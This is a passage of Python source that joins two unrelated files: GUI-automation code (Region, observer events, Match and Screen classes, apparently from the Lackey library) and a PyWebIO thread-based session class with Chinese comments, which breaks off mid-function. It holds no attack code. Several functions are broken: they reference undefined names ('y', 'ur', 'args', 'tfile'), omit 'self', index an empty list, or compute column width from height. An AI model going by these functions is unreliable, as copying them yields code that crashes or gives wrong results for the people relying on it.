MID_HORIZONTAL = "MID_HORZ" # Half of height horizontally centered
MID_BIG = "MID_HALF" # Half of width/half of height centered
def setRaster(self, rows, columns):
""" Sets the raster for the region, allowing sections to be indexed by row/column """
rows = int(rows)
columns = int(columns)
if rows <= 0 or columns <= 0:
return self
self._raster = (rows, columns)
return self.getCell(0, 0)
def getRow(self, row, numberRows=None):
""" Returns the specified row of the region (if the raster is set)
If numberRows is provided, uses that instead of the raster
"""
row = int(row)
if self._raster[0] == 0 or self._raster[1] == 0:
return self
if numberRows is None or numberRows < 1 or numberRows > 9:
numberRows = self._raster[0]
rowHeight = self.h / numberRows
if row < 0:
# If row is negative, count backwards from the end
row = numberRows - row
if row < 0:
# Bad row index, return last row
return Region(self.x, self.y+self.h-rowHeight, self.w, rowHeight)
elif row > numberRows:
# Bad row index, return first row
return Region(self.x, self.y, self.w, rowHeight)
return Region(self.x, self.y + (row * rowHeight), self.w, rowHeight)
def getCol(self, column, numberColumns=None):
""" Returns the specified column of the region (if the raster is set)
If numberColumns is provided, uses that instead of the raster
"""
column = int(column)
if self._raster[0] == 0 or self._raster[1] == 0:
return self
if numberColumns is None or numberColumns < 1 or numberColumns > 9:
numberColumns = self._raster[1]
columnWidth = self.w / numberColumns
if column < 0:
# If column is negative, count backwards from the end
column = numberColumns - column
if column < 0:
# Bad column index, return last column
return Region(self.x+self.w-columnWidth, self.y, columnWidth, self.h)
elif column > numberColumns:
# Bad column index, return first column
return Region(self.x, self.y, columnWidth, self.h)
return Region(self.x + (column * columnWidth), self.y, columnWidth, self.h)
def getCell(self, row, column):
""" Returns the specified cell (if a raster is set for the region) """
row = int(row)
column = int(column)
if self._raster[0] == 0 or self._raster[1] == 0:
return self
rowHeight = self.h / self._raster[0]
columnWidth = self.h / self._raster[1]
if column < 0:
# If column is negative, count backwards from the end
column = self._raster[1] - column
if column < 0:
# Bad column index, return last column
column = self._raster[1]
elif column > self._raster[1]:
# Bad column index, return first column
column = 0
if row < 0:
# If row is negative, count backwards from the end
row = self._raster[0] - row
if row < 0:
# Bad row index, return last row
row = self._raster[0]
elif row > self._raster[0]:
# Bad row index, return first row
row = 0
return Region(self.x+(column*columnWidth), self.y+(row*rowHeight), columnWidth, rowHeight)
def get(self, part):
""" Returns a section of the region as a new region
Accepts partitioning constants, e.g. Region.NORTH, Region.NORTH_WEST, etc.
Also accepts an int 200-999:
* First digit: Raster (*n* rows by *n* columns)
* Second digit: Row index (if equal to raster, gets the whole row)
* Third digit: Column index (if equal to raster, gets the whole column)
Region.get(522) will use a raster of 5 rows and 5 columns and return
the cell in the middle.
Region.get(525) will use a raster of 5 rows and 5 columns and return the row in the middle.
"""
if part == self.MID_VERTICAL:
return Region(self.x+(self.w/4), y, self.w/2, self.h)
elif part == self.MID_HORIZONTAL:
return Region(self.x, self.y+(self.h/4), self.w, self.h/2)
elif part == self.MID_BIG:
return Region(self.x+(self.w/4), self.y+(self.h/4), self.w/2, self.h/2)
elif isinstance(part, int) and part >= 200 and part <= 999:
raster, row, column = str(part)
self.setRaster(raster, raster)
if row == raster and column == raster:
return self
elif row == raster:
return self.getCol(column)
elif column == raster:
return self.getRow(row)
else:
return self.getCell(row,column)
else:
return self
def setRows(self, rows):
""" Sets the number of rows in the raster (if columns have not been initialized, set to 1 as well) """
self._raster[0] = rows
if self._raster[1] == 0:
self._raster[1] = 1
def setCols(self, columns):
""" Sets the number of columns in the raster (if rows have not been initialized, set to 1 as well) """
self._raster[1] = columns
if self._raster[0] == 0:
self._raster[0] = 1
def isRasterValid(self):
return self.getCols() > 0 and self.getRows() > 0
def getRows(self):
return self._raster[0]
def getCols(self):
return self._raster[1]
def getRowH(self):
if self._raster[0] == 0:
return 0
return self.h / self._raster[0]
def getColW(self):
if self._raster[1] == 0:
return 0
return self.w / self._raster[1]
def showScreens(self):
""" Synonym for showMonitors """
Screen.showMonitors()
def resetScreens(self):
""" Synonym for resetMonitors """
Screen.resetMonitors()
def getTarget(self):
""" By default, a region's target is its center """
return self.getCenter()
def setCenter(self, loc):
""" Move this region so it is centered on ``loc`` """
offset = self.getCenter().getOffset(loc) # Calculate offset from current center
return self.setLocation(self.getTopLeft().offset(offset)) # Move top left corner by the same offset
def setTopLeft(self, loc):
""" Move this region so its top left corner is on ``loc`` """
return self.setLocation(loc)
def setTopRight(self, loc):
""" Move this region so its top right corner is on ``loc`` """
offset = self.getTopRight().getOffset(loc) # Calculate offset from current top right
return self.setLocation(self.getTopLeft().offset(offset)) # Move top left corner by the same offset
def setBottomLeft(self, loc):
""" Move this region so its bottom left corner is on ``loc`` """
offset = self.getBottomLeft().getOffset(loc) # Calculate offset from current bottom left
return self.setLocation(self.getTopLeft().offset(offset)) # Move top left corner by the same offset
def setBottomRight(self, loc):
""" Move this region so its bottom right corner is on ``loc`` """
offset = self.getBottomRight().getOffset(loc) # Calculate offset from current bottom right
return self.setLocation(self.getTopLeft().offset(offset)) # Move top left corner by the same offset
def setSize(self, w, h):
""" Sets the new size of the region """
self.setW(w)
self.setH(h)
return self
def setRect(self, *args):
""" Sets the rect of the region. Accepts the following arguments:
setRect(rect_tuple)
setRect(x, y, w, h)
setRect(rect_region)
"""
if len(args) == 1:
if isinstance(args[0], tuple):
x, y, w, h = args[0]
elif isinstance(args[0], Region):
x = Region.getX()
y = Region.getY()
w = Region.getW()
h = Region.getH()
else:
raise TypeError("Unrecognized arguments for setRect")
elif len(args) == 4:
x, y, w, h = args
else:
raise TypeError("Unrecognized arguments for setRect")
self.setX(x)
self.setY(y)
self.setW(w)
self.setH(h)
return self
def saveScreenCapture(self, path=None, name=None):
""" Saves the region's bitmap """
bitmap = self.getBitmap()
target_file = None
if path is None and name is None:
_, target_file = tempfile.mkstemp(".png")
elif name is None:
_, tpath = tempfile.mkstemp(".png")
target_file = os.path.join(path, tfile)
else:
target_file = os.path.join(path, name+".png")
cv2.imwrite(target_file, bitmap)
return target_file
def getLastScreenImage(self):
""" Gets the last image taken on this region's screen """
return self.getScreen().getLastScreenImageFromScreen()
def saveLastScreenImage(self):
""" Saves the last image taken on this region's screen to a temporary file """
bitmap = self.getLastScreenImage()
_, target_file = tempfile.mkstemp(".png")
cv2.imwrite(target_file, bitmap)
def asOffset(self):
""" Returns bottom right corner as offset from top left corner """
return Location(self.getW(), self.getH())
def rightAt(self, offset=0):
""" Returns point in the center of the region's right side (offset to the right
by ``offset``) """
return Location(self.getX() + self.getW() + offset, self.getY() + (self.getH() / 2))
def leftAt(self, offset=0):
""" Returns point in the center of the region's left side (offset to the left
by negative ``offset``) """
return Location(self.getX() + offset, self.getY() + (self.getH() / 2))
def aboveAt(self, offset=0):
""" Returns point in the center of the region's top side (offset to the top
by negative ``offset``) """
return Location(self.getX() + (getW() / 2), self.getY() + offset)
def bottomAt(self, offset=0):
""" Returns point in the center of the region's bottom side (offset to the bottom
by ``offset``) """
return Location(self.getX() + (getW() / 2), self.getY() + self.getH() + offset)
def union(ur):
""" Returns a new region that contains both this region and the specified region """
x = min(self.getX(), ur.getX())
y = min(self.getY(), ur.getY())
w = max(self.getBottomRight().x, ur.getBottomRight().x) - x
h = max(self.getBottomRight().y, ur.getBottomRight().y) - y
return Region(x, y, w, h)
def intersection(ir):
""" Returns a new region that contains the overlapping portion of this region and the specified region (may be None) """
x = max(self.getX(), ur.getX())
y = max(self.getY(), ur.getY())
w = min(self.getBottomRight().x, ur.getBottomRight().x) - x
h = min(self.getBottomRight().y, ur.getBottomRight().y) - y
if w > 0 and h > 0:
return Region(x, y, w, h)
return None
def findAllByRow(self, target):
""" Returns an array of rows in the region (defined by the raster), each
row containing all matches in that row for the target pattern. """
row_matches = []
for row_index in range(self._raster[0]):
row = self.getRow(row_index)
row_matches[row_index] = row.findAll(target)
return row_matches
def findAllBycolumn(self, target):
""" Returns an array of columns in the region (defined by the raster), each
column containing all matches in that column for the target pattern. """
column_matches = []
for column_index in range(self._raster[1]):
column = self.getRow(column_index)
column_matches[column_index] = column.findAll(target)
return column_matches
def findBest(self, pattern):
""" Returns the *best* match in the region (instead of the first match) """
findFailedRetry = True
while findFailedRetry:
best_match = None
all_matches = self.findAll(*args)
for match in all_matches:
if best_match is None or best_match.getScore() < match.getScore():
best_match = match
self._lastMatch = best_match
if best_match is not None:
break
path = pattern.path if isinstance(pattern, Pattern) else pattern
findFailedRetry = self._raiseFindFailed("Could not find pattern '{}'".format(path))
if findFailedRetry:
time.sleep(self._repeatWaitTime)
return best_match
def compare(self, image):
""" Compares the region to the specified image """
return exists(Pattern(image), 0)
def findText(self, text, timeout=None):
""" OCR function """
raise NotImplementedError()
def findAllText(self, text):
""" OCR function """
raise NotImplementedError()
# Event Handlers
def onAppear(self, pattern, handler=None):
""" Registers an event to call ``handler`` when ``pattern`` appears in this region.
The ``handler`` function should take one parameter, an ObserveEvent object
(see below). This event is ignored in the future unless the handler calls
the repeat() method on the provided ObserveEvent object.
Returns the event's ID as a string.
"""
return self._observer.register_event("APPEAR", pattern, handler)
def onVanish(self, pattern, handler=None):
""" Registers an event to call ``handler`` when ``pattern`` disappears from this region.
The ``handler`` function should take one parameter, an ObserveEvent object
(see below). This event is ignored in the future unless the handler calls
the repeat() method on the provided ObserveEvent object.
Returns the event's ID as a string.
"""
return self._observer.register_event("VANISH", pattern, handler)
def onChange(self, min_changed_pixels=None, handler=None):
""" Registers an event to call ``handler`` when at least ``min_changed_pixels``
change in this region.
(Default for min_changed_pixels is set in Settings.ObserveMinChangedPixels)
The ``handler`` function should take one parameter, an ObserveEvent object
(see below). This event is ignored in the future unless the handler calls
the repeat() method on the provided ObserveEvent object.
Returns the event's ID as a string.
"""
if isinstance(min_changed_pixels, int) and (callable(handler) or handler is None):
return self._observer.register_event(
"CHANGE",
pattern=(min_changed_pixels, self.getBitmap()),
handler=handler)
elif (callable(min_changed_pixels) or min_changed_pixels is None) and (callable(handler) or handler is None):
handler = min_changed_pixels or handler
return self._observer.register_event(
"CHANGE",
pattern=(Settings.ObserveMinChangedPixels, self.getBitmap()),
handler=handler)
else:
raise ValueError("Unsupported arguments for onChange method")
def isChanged(self, min_changed_pixels, screen_state):
""" Returns true if at least ``min_changed_pixels`` are different between
``screen_state`` and the current state.
"""
r = self.clipRegionToScreen()
current_state = r.getBitmap()
diff = numpy.subtract(current_state, screen_state)
return (numpy.count_nonzero(diff) >= min_changed_pixels)
def observe(self, seconds=None):
""" Begins the observer loop (synchronously).
Loops for ``seconds`` or until this region's stopObserver() method is called.
If ``seconds`` is None, the observer loop cycles until stopped. If this
method is called while the observer loop is already running, it returns False.
Returns True if the observer could be started, False otherwise.
"""
# Check if observer is already running
if self._observer.isRunning:
return False # Could not start
# Set timeout
if seconds is not None:
timeout = time.time() + seconds
else:
timeout = None
# Start observe loop
while (not self._observer.isStopped) and (seconds is None or time.time() < timeout):
# Check registered events
self._observer.check_events()
# Sleep for scan rate
time.sleep(1/self.getObserveScanRate())
return True
def getObserveScanRate(self):
""" Gets the number of times per second the observe loop should run """
return self._observeScanRate if self._observeScanRate is not None else Settings.ObserveScanRate
def setObserveScanRate(self, scan_rate):
""" Set the number of times per second the observe loop should run """
self._observeScanRate = scan_rate
def getRepeatWaitTime(self):
""" Gets the wait time before repeating a search """
return self._repeatWaitTime
def setRepeatWaitTime(self, wait_time):
""" Sets the wait time before repeating a search """
self._repeatWaitTime = wait_time
def observeInBackground(self, seconds=None):
""" As Region.observe(), but runs in a background process, allowing the rest
of your script to continue.
Note that the subprocess operates on *copies* of the usual objects, not the original
Region object itself for example. If your event handler needs to share data with your
main process, check out the documentation for the ``multiprocessing`` module to set up
shared memory.
"""
if self._observer.isRunning:
return False
self._observer_process = multiprocessing.Process(target=self.observe, args=(seconds,))
self._observer_process.start()
return True
def stopObserver(self):
""" Stops this region's observer loop.
If this is running in a subprocess, the subprocess will end automatically.
"""
self._observer.isStopped = True
self._observer.isRunning = False
def hasObserver(self):
""" Check whether at least one event is registered for this region.
The observer may or may not be running.
"""
return self._observer.has_events()
def isObserving(self):
""" Check whether an observer is running for this region """
return self._observer.isRunning
def hasEvents(self):
""" Check whether any events have been caught for this region """
return len(self._observer.caught_events) > 0
def getEvents(self):
""" Returns a list of all events that have occurred.
Empties the internal queue.
"""
caught_events = self._observer.caught_events
self._observer.caught_events = []
for event in caught_events:
self._observer.activate_event(event["name"])
return caught_events
def getEvent(self, name):
""" Returns the named event.
Removes it from the internal queue.
"""
to_return = None
for event in self._observer.caught_events:
if event["name"] == name:
to_return = event
break
if to_return:
self._observer.caught_events.remove(to_return)
self._observer.activate_event(to_return["name"])
return to_return
def setInactive(self, name):
""" The specified event is ignored until reactivated
or until the observer restarts.
"""
self._observer.inactivate_event(name)
def setActive(self, name):
""" Activates an inactive event type. """
self._observer.activate_event(name)
def _raiseImageMissing(self, pattern):
""" Builds an ImageMissing event and triggers the default handler (or the custom handler,
if one has been specified). Returns True if throwing method should retry, False if it
should skip, and throws an exception if it should abort. """
event = ImageMissingEvent(self, pattern=pattern, event_type="MISSING")
if self._imageMissingHandler is not None:
self._imageMissingHandler(event)
response = (event._response or self._findFailedResponse)
#if response == "PROMPT": # Prompt not valid for ImageMissing error
# response = _findFailedPrompt(pattern)
if response == "ABORT":
raise FindFailed(event)
elif response == "SKIP":
return False
elif response == "RETRY":
return True
def setImageMissingHandler(self, handler):
""" Set a handler to receive ImageMissing events (instead of triggering
an exception). """
if not callable(handler):
raise ValueError("Expected ImageMissing handler to be a callable")
self._imageMissingHandler = handler
## FindFailed event handling ##
# Constants
ABORT = "ABORT"
SKIP = "SKIP"
PROMPT = "PROMPT"
RETRY = "RETRY"
def setFindFailedResponse(self, response):
""" Set the response to a FindFailed exception in this region.
Can be ABORT, SKIP, PROMPT, or RETRY. """
valid_responses = ("ABORT", "SKIP", "PROMPT", "RETRY")
if response not in valid_responses:
raise ValueError("Invalid response - expected one of ({})".format(", ".join(valid_responses)))
self._findFailedResponse = response
def setFindFailedHandler(self, handler):
""" Set a handler to receive FindFailed events (instead of triggering
an exception). """
if not callable(handler):
raise ValueError("Expected FindFailed handler to be a callable")
self._findFailedHandler = handler
def getFindFailedResponse(self):
""" Returns the current default response to a FindFailed exception """
return self._findFailedResponse
def setThrowException(self, setting):
""" Defines whether an exception should be thrown for FindFailed operations.
``setting`` should be True or False. """
if setting:
self._throwException = True
self._findFailedResponse = "ABORT"
else:
self._throwException = False
self._findFailedResponse = "SKIP"
def getThrowException(self):
""" Returns True if an exception will be thrown for FindFailed operations,
False otherwise. """
return self._throwException
def _raiseFindFailed(self, pattern):
""" Builds a FindFailed event and triggers the default handler (or the custom handler,
if one has been specified). Returns True if throwing method should retry, False if it
should skip, and throws an exception if it should abort. """
event = FindFailedEvent(self, pattern=pattern, event_type="FINDFAILED")
if self._findFailedHandler is not None:
self._findFailedHandler(event)
response = (event._response or self._findFailedResponse)
if response == "PROMPT":
response = _findFailedPrompt(pattern)
if response == "ABORT":
raise FindFailed(event)
elif response == "SKIP":
return False
elif response == "RETRY":
return True
def _findFailedPrompt(self, pattern):
ret_value = tkmb.showerror(
title="Sikuli Prompt",
message="Could not find target '{}'. Abort, retry, or skip?".format(pattern),
type=tkmb.ABORTRETRYIGNORE)
value_map = {
"abort": "ABORT",
"retry": "RETRY",
"ignore": "SKIP"
}
return value_map[ret_value]
class Observer(object):
def __init__(self, region):
self._supported_events = ("APPEAR", "VANISH", "CHANGE")
self._region = region
self._events = {}
self.isStopped = False
self.isRunning = False
self.caught_events = []
def inactivate_event(self, name):
if name in self._events:
self._events[name].active = False
def activate_event(self, name):
if name in self._events:
self._events[name].active = True
def has_events(self):
return len(self._events) > 0
def register_event(self, event_type, pattern, handler):
""" When ``event_type`` is observed for ``pattern``, triggers ``handler``.
For "CHANGE" events, ``pattern`` should be a tuple of ``min_changed_pixels`` and
the base screen state.
"""
if event_type not in self._supported_events:
raise ValueError("Unsupported event type {}".format(event_type))
if not isinstance(pattern, Pattern) and not isinstance(pattern, basestring):
raise ValueError("Expected pattern to be a Pattern or string")
# Create event object
event = {
"pattern": pattern,
"event_type": event_type,
"count": 0,
"handler": handler,
"name": uuid.uuid4(),
"active": True
}
self._events[event["name"]] = event
return event["name"]
def check_events(self):
for event_name in self._events.keys():
event = self._events[event_name]
if not event["active"]:
continue
event_type = event["event_type"]
pattern = event["pattern"]
handler = event["handler"]
if event_type == "APPEAR" and self._region.exists(event["pattern"], 0):
# Call the handler with a new ObserveEvent object
appear_event = ObserveEvent(self._region,
count=event["count"],
pattern=event["pattern"],
event_type=event["event_type"])
if callable(handler):
handler(appear_event)
self.caught_events.append(appear_event)
event["count"] += 1
# Event handlers are inactivated after being caught once
event["active"] = False
elif event_type == "VANISH" and not self._region.exists(event["pattern"], 0):
# Call the handler with a new ObserveEvent object
vanish_event = ObserveEvent(self._region,
count=event["count"],
pattern=event["pattern"],
event_type=event["event_type"])
if callable(handler):
handler(vanish_event)
else:
self.caught_events.append(vanish_event)
event["count"] += 1
# Event handlers are inactivated after being caught once
event["active"] = False
# For a CHANGE event, ``pattern`` is a tuple of
# (min_pixels_changed, original_region_state)
elif event_type == "CHANGE" and self._region.isChanged(*event["pattern"]):
# Call the handler with a new ObserveEvent object
change_event = ObserveEvent(self._region,
count=event["count"],
pattern=event["pattern"],
event_type=event["event_type"])
if callable(handler):
handler(change_event)
else:
self.caught_events.append(change_event)
event["count"] += 1
# Event handlers are inactivated after being caught once
event["active"] = False
class ObserveEvent(object):
def __init__(self, region=None, count=0, pattern=None, match=None, event_type="GENERIC"):
self._valid_types = ["APPEAR", "VANISH", "CHANGE", "GENERIC", "FINDFAILED", "MISSING"]
self._type = event_type
self._region = region
self._pattern = pattern
self._match = match
self._count = count
def getType(self):
return self._type
def isAppear(self):
return (self._type == "APPEAR")
def isVanish(self):
return (self._type == "VANISH")
def isChange(self):
return (self._type == "CHANGE")
def isGeneric(self):
return (self._type == "GENERIC")
def isFindFailed(self):
return (self._type == "FINDFAILED")
def isMissing(self):
return (self._type == "MISSING")
def getRegion(self):
return self._region
def getPattern(self):
return self._pattern
def getImage(self):
valid_types = ["APPEAR", "VANISH", "FINDFAILED", "MISSING"]
if self._type not in valid_types:
raise TypeError("This is a(n) {} event, but method getImage is only valid for the following event types: ({})".format(self._type, ", ".join(valid_types)))
elif self._pattern is None:
raise ValueError("This event's pattern was not set!")
return cv2.imread(self._pattern.path)
def getMatch(self):
valid_types = ["APPEAR", "VANISH"]
if self._type not in valid_types:
raise TypeError("This is a(n) {} event, but method getMatch is only valid for the following event types: ({})".format(self._type, ", ".join(valid_types)))
elif self._match is None:
raise ValueError("This event's match was not set!")
return self._match
def getChanges(self):
valid_types = ["CHANGE"]
if self._type not in valid_types:
raise TypeError("This is a(n) {} event, but method getChanges is only valid for the following event types: ({})".format(self._type, ", ".join(valid_types)))
elif self._match is None:
raise ValueError("This event's match was not set!")
return self._match
def getCount(self):
return self._count
class FindFailedEvent(ObserveEvent):
def __init__(self, *args, **kwargs):
ObserveEvent.__init__(self, *args, **kwargs)
self._response = None
def setResponse(response):
valid_responses = ("ABORT", "SKIP", "PROMPT", "RETRY")
if response not in valid_responses:
raise ValueError("Invalid response - expected one of ({})".format(", ".join(valid_responses)))
else:
self._response = response
def __repr__(self):
if hasattr(self._pattern, "path"):
return self._pattern.path
return self._pattern
class ImageMissingEvent(ObserveEvent):
def __init__(self, *args, **kwargs):
ObserveEvent.__init__(self, *args, **kwargs)
self._response = None
def setResponse(response):
valid_responses = ("ABORT", "SKIP", "RETRY")
if response not in valid_responses:
raise ValueError("Invalid response - expected one of ({})".format(", ".join(valid_responses)))
else:
self._response = response
def __repr__(self):
if hasattr(self._pattern, "path"):
return self._pattern.path
return self._pattern
class Match(Region):
""" Extended Region object with additional data on click target, match score """
def __init__(self, score, target, rect):
super(Match, self).__init__(rect[0][0], rect[0][1], rect[1][0], rect[1][1])
self._score = float(score)
if not target or not isinstance(target, Location):
raise TypeError("Match expected target to be a Location object")
self._target = target
def getScore(self):
""" Returns confidence score of the match """
return self._score
def getTarget(self):
""" Returns the location of the match click target (center by default, but may be offset) """
return self.getCenter().offset(self._target.x, self._target.y)
def __repr__(self):
return "Match[{},{} {}x{}] score={:2f}, target={}".format(self.x, self.y, self.w, self.h, self._score, self._target.getTuple())
class Screen(Region):
""" Individual screen objects can be created for each monitor in a multi-monitor system.
Screens are indexed according to the system order. 0 is the primary monitor (display 1),
1 is the next monitor, etc.
Lackey also makes it possible to search all screens as a single "virtual screen," arranged
according to the system's settings. Screen(-1) returns this virtual screen. Note that the
larger your search region is, the slower your search will be, so it's best practice to adjust
your region to the particular area of the screen where you know your target will be.
Note that Sikuli is inconsistent in identifying screens. In Windows, Sikuli identifies the
first hardware monitor as Screen(0) rather than the actual primary monitor. However, on OS X
it follows the latter convention. We've opted to make Screen(0) the actual primary monitor
(wherever the Start Menu/System Menu Bar is) across the board.
"""
primaryScreen = 0
def __init__(self, screenId=None):
""" Defaults to the main screen. """
if not isinstance(screenId, int) or screenId < -1 or screenId >= len(PlatformManager.getScreenDetails()):
screenId = Screen.getPrimaryID()
self._screenId = screenId
x, y, w, h = self.getBounds()
self.lastScreenImage = None
super(Screen, self).__init__(x, y, w, h)
@classmethod
def getNumberScreens(cls):
""" Get the number of screens in a multi-monitor environment at the time the script is running """
return len(PlatformManager.getScreenDetails())
def getBounds(self):
""" Returns bounds of screen as (x, y, w, h) """
return PlatformManager.getScreenBounds(self._screenId)
def capture(self, *args): #x=None, y=None, w=None, h=None):
""" Captures the region as an image """
if len(args) == 0:
# Capture screen region
region = self
elif isinstance(args[0], Region):
# Capture specified region
region = args[0]
elif isinstance(args[0], tuple):
# Capture region defined by specified tuple
region = Region(*args[0])
elif isinstance(args[0], basestring):
# Interactive mode
raise NotImplementedError("Interactive capture mode not defined")
elif isinstance(args[0], int):
# Capture region defined by provided x,y,w,h
region = Region(*args)
self.lastScreenImage = region.getBitmap()
return self.lastScreenImage
captureForHighlight = capture
def selectRegion(self, text=""):
""" Not yet implemented """
raise NotImplementedError()
def doPrompt(self, message, obs):
""" Not yet implemented """
raise NotImplementedError()
def closePrompt(self):
""" Not yet implemented """
raise NotImplementedError()
def resetPrompt(self):
""" Not yet implemented """
raise NotImplementedError()
def hasPrompt(self):
""" Not yet implemented """
raise NotImplementedError()
def userCapture(self, message=""):
""" Not yet implemented """
raise NotImplementedError()
def saveCapture(self, name, reg=None):
""" Not yet implemented """
raise NotImplementedError()
def getCurrentID(self):
""" Returns screen ID """
return self._screenId
getID = getCurrentID
@classmethod
def getPrimaryID(cls):
""" Returns primary screen ID """
return cls.primaryScreen
@classmethod
def getPrimaryScreen(cls):
""" Returns the primary screen """
return Screen(cls.primaryScreen)
@classmethod
def showMonitors(cls):
""" Prints debug information about currently detected screens """
Debug.info("*** monitor configuration [ {} Screen(s)] ***".format(cls.getNumberScreens()))
Debug.info("*** Primary is Screen {}".format(cls.primaryScreen))
for index, screen in enumerate(PlatformManager.getScreenDetails()):
Debug.info("Screen {}: ({}, {}, {}, {})".format(index, *screen["rect"]))
Debug.info("*** end monitor configuration ***")
def resetMonitors(self):
""" Recalculates screen based on changed monitor setup """
Debug.error("*** BE AWARE: experimental - might not work ***")
Debug.error("Re-evaluation of the monitor setup has been requested")
Debug.error("... Current Region/Screen objects might not be valid any longer")
Debug.error("... Use existing Region/Screen objects only if you know what you are doing!")
self.__init__(self._screenId)
self.showMonitors()
def newRegion(self, loc, width, height):
""" Creates a new region on the current screen at the specified offset with the specified
width and height. """
return Region.create(self.getTopLeft().offset(loc), width, height)
def getLastScreenImageFromScreen(self):
""" Returns the last captured image from this screen """
return self.lastScreenImage
def newLocation(self, loc):
""" Creates a new location on this screen, with the same offset it would have had on the
default screen """
return Location(loc).copyTo(self)
def showTarget(self):
""" Not yet implemented """
raise NotImplementedError()
|
threadbased.py
|
import logging
import queue
import threading
from functools import wraps
from .base import Session
from ..exceptions import SessionNotFoundException, SessionClosedException, SessionException
from ..utils import random_str, LimitedSizeQueue, isgeneratorfunction, iscoroutinefunction, \
get_function_name
logger = logging.getLogger(__name__)
"""
基于线程的会话实现
当任务函数返回并且会话内所有的通过 register_thread(thread) 注册的线程都退出后,会话结束,连接关闭。
正在等待PyWebIO输入的线程会在输入函数中抛出SessionClosedException异常,
其他线程若调用PyWebIO输入输出函数会引发异常SessionException
"""
# todo 线程安全
class ThreadBasedSession(Session):
thread2session = {} # thread_id -> session
unhandled_task_mq_maxsize = 1000
event_mq_maxsize = 100
callback_mq_maxsize = 100
@classmethod
def get_current_session(cls) -> "ThreadBasedSession":
curr = id(threading.current_thread())
session = cls.thread2session.get(curr)
if session is None:
raise SessionNotFoundException("Can't find current session. "
"Maybe session closed or forget to use `register_thread()`.")
return session
@classmethod
def get_current_task_id(cls):
return cls._get_task_id(threading.current_thread())
@staticmethod
def _get_task_id(thread: threading.Thread):
tname = getattr(thread, '_target', 'task')
tname = getattr(tname, '__name__', tname)
return '%s-%s' % (tname, id(thread))
def __init__(self, target, session_info, on_task_command=None, on_session_close=None, loop=None):
"""
:param target: 会话运行的函数. 为None时表示Script mode
:param on_task_command: 当Task内发送Command给session的时候触发的处理函数
:param on_session_close: 会话结束的处理函数
:param loop: 事件循环。若 on_task_command 或者 on_session_close 中有调用使用asyncio事件循环的调用,
则需要事件循环实例来将回调在事件循环的线程中执行
"""
assert target is None or (not iscoroutinefunction(target)) and (not isgeneratorfunction(target)), ValueError(
"ThreadBasedSession only accept a simple function as task function, "
"not coroutine function or generator function. ")
super().__init__(session_info)
self._on_task_command = on_task_command or (lambda _: None)
self._on_session_close = on_session_close or (lambda: None)
self._loop = loop
self.threads = [] # 注册到当前会话的线程集合
self.unhandled_task_msgs = LimitedSizeQueue(maxsize=self.unhandled_task_mq_maxsize)
self.task_mqs = {} # task_id -> event msg queue
self._closed = False
# 用于实现回调函数的注册
self.callback_mq = None
self.callback_thread = None
self.callbacks = {} # callback_id -> (callback_func, is_mutex)
if target is not None:
self._start_main_task(target)
def _start_main_task(self, target):
@wraps(target)
def main_task(target):
try:
target()
except Exception as e:
if not isinstance(e, SessionException):
self.on_task_exception()
finally:
for t in self.threads:
if t.is_alive() and t is not threading.current_thread():
t.join()
try:
if self.need_keep_alive():
from ..session import hold
hold()
else:
self.send_task_command(dict(command='close_session'))
except SessionException: # ignore SessionException error
pass
finally:
self._trigger_close_event()
self.close()
thread = threading.Thread(target=main_task, kwargs=dict(target=target),
daemon=True, name='main_task')
self.register_thread(thread)
thread.start()
def send_task_command(self, command):
"""向会话发送来自pywebio应用的消息
:param dict command: 消息
"""
if self.closed():
raise SessionClosedException()
self.unhandled_task_msgs.put(command)
if self._loop:
self._loop.call_soon_threadsafe(self._on_task_command, self)
else:
self._on_task_command(self)
def next_client_event(self):
# 函数开始不需要判断 self.closed()
# 如果会话关闭,对 get_current_session().next_client_event() 的调用会抛出SessionNotFoundException
task_id = self.get_current_task_id()
event_mq = self.get_current_session().task_mqs.get(task_id)
if event_mq is None:
raise SessionNotFoundException
event = event_mq.get()
if event is None:
raise SessionClosedException
return event
def send_client_event(self, event):
"""向会话发送来自用户浏览器的事件️
:param dict event: 事件️消息
"""
task_id = event['task_id']
mq = self.task_mqs.get(task_id)
if not mq and task_id in self.callbacks:
mq = self.callback_mq
if not mq:
logger.error('event_mqs not found, task_id:%s', task_id)
return
try:
mq.put_nowait(event) # disable blocking, because this is call by backend
except queue.Full:
logger.error('Message queue is full, discard new messages') # todo: alert user
def get_task_commands(self):
return self.unhandled_task_msgs.get()
def _trigger_close_event(self):
"""触发Backend on_session_close callback"""
if self.closed():
return
if self._loop:
self._loop.call_soon_threadsafe(self._on_session_close)
else:
self._on_session_close()
def _cleanup(self, nonblock=False):
cls = type(self)
if not nonblock:
self.unhandled_task_msgs.wait_empty(8)
if not self.unhandled_task_msgs.empty():
msg = self.unhandled_task_msgs.get()
logger.warning("%d unhandled task messages when session close. [%s]", len(msg), threading.current_thread())
for t in self.threads:
# delete registered thread
# so the `get_current_session()` call in those thread will raise SessionNotFoundException
del cls.thread2session[id(t)]
if self.callback_thread:
del cls.thread2session[id(self.callback_thread)]
def try_best_to_add_item_to_mq(mq, item, try_count=10):
for _ in range(try_count):
try:
mq.put(item, block=False)
return True
except queue.Full:
try:
mq.get(block=False)
except queue.Empty:
pass
if self.callback_mq is not None: # 回调功能已经激活, 结束回调线程
try_best_to_add_item_to_mq(self.callback_mq, None)
for mq in self.task_mqs.values():
try_best_to_add_item_to_mq(mq, None) # 消费端接收到None消息会抛出SessionClosedException异常
self.task_mqs = {}
def close(self, nonblock=False):
"""关闭当前Session。由Backend调用"""
# todo self._closed 会有竞争条件
if self.closed():
return
super().close()
self._cleanup(nonblock=nonblock)
def _activate_callback_env(self):
"""激活回调功能
ThreadBasedSession 的回调实现原理是:创建一个单独的线程用于接收回调事件,进而调用相关的回调函数。
当用户Task中并没有使用到回调功能时,不必开启此线程,可以节省资源
"""
if self.callback_mq is not None: # 回调功能已经激活
return
self.callback_mq = queue.Queue(maxsize=self.callback_mq_maxsize)
self.callback_thread = threading.Thread(target=self._dispatch_callback_event,
daemon=True, name='callback-' + random_str(10))
# self.register_thread(self.callback_thread)
self.thread2session[id(self.callback_thread)] = self # 用于在线程内获取会话
event_mq = queue.Queue(maxsize=self.event_mq_maxsize) # 回调线程内的用户事件队列
self.task_mqs[self._get_task_id(self.callback_thread)] = event_mq
self.callback_thread.start()
logger.debug('Callback thread start')
def _dispatch_callback_event(self):
while not self.closed():
event = self.callback_mq.get()
if event is None: # 结束信号
logger.debug('Callback thread exit')
break
callback_info = self.callbacks.get(event['task_id'])
if not callback_info:
logger.error("No callback for callback_id:%s", event['task_id'])
return
callback, mutex = callback_info
@wraps(callback)
def run(callback):
try:
callback(event['data'])
